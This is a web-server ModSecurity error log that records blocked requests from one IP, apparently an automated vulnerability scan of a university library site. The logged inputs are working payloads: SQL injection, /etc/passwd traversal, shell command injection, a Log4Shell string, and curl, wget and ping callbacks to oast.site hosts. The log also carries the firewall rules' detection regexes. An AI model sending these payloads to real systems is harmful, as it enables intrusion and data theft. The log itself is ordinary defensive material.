[Tue Aug 29 11:33:09.907571 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAANsAb4AAAAD"]
[Tue Aug 29 11:33:10.348277 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARdiGYAAAAK"]
[Tue Aug 29 11:33:11.295368 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARD1SgAAAAH"]
[Tue Aug 29 11:33:12.512913 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAANsAcUAAAAD"]
[Tue Aug 29 11:33:12.597124 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgb1yms1z8w7wwi.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgb1yms1z8w7wwi.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NgAAAAM"]
[Tue Aug 29 11:33:12.805607 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgsqmmf6fydxnyp.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgsqmmf6fydxnyp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARR27IAAAAF"]
[Tue Aug 29 11:33:12.824824 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARH7N4AAAAM"]
[Tue Aug 29 11:33:13.301858 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg3ghponkai1dxn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg3ghponkai1dxn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAANsAc8AAAAD"]
[Tue Aug 29 11:33:13.339501 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgamichewocjhcz.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgamichewocjhcz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMQAAAAG"]
[Tue Aug 29 11:33:14.385241 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAANsAdEAAAAD"]
[Tue Aug 29 11:33:14.513244 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARNk9sAAAAS"]
[Tue Aug 29 11:33:14.564360 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARR27kAAAAF"]
[Tue Aug 29 11:33:17.636232 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgsb57ujpyde57y.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DcCo-f0AAARiDlUAAAAJ"]
[Tue Aug 29 11:33:18.673493 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgomriz6q9tiesk.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmHsAAAAR"]
[Tue Aug 29 11:33:18.996442 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARu2qEAAAAW"]
[Tue Aug 29 11:33:19.027274 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARQ38gAAAAB"]
[Tue Aug 29 11:33:19.079502 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARy-sMAAAAb"]
[Tue Aug 29 11:33:19.301617 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARzXwYAAAAd"]
[Tue Aug 29 11:33:19.319387 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARv7PQAAAAY"]
[Tue Aug 29 11:33:20.326477 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EMCo-f0AAARwurMAAAAZ"]
[Tue Aug 29 11:33:21.311832 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlg399e48qu3ixyb.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EcCo-f0AAARQ39MAAAAB"]
[Tue Aug 29 11:33:22.440894 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARzXxIAAAAd"]
[Tue Aug 29 11:33:23.355125 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlg6qkwiqskkpyx3.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11E8Co-f0AAARo8xsAAAAT"]
[Tue Aug 29 11:33:23.364643 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARxOqYAAAAa"]
[Tue Aug 29 11:33:24.330490 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARdiI4AAAAK"]
[Tue Aug 29 11:33:25.331991 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FcCo-f0AAARxOqkAAAAa"]
[Tue Aug 29 11:33:25.343284 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARo8yIAAAAT"]
[Tue Aug 29 11:33:25.359764 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARTEOQAAAAG"]
[Tue Aug 29 11:33:26.381330 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgjkdb3p5kh69ix.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAAOJKdEAAAAE"]
[Tue Aug 29 11:33:26.468108 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARu2rwAAAAW"]
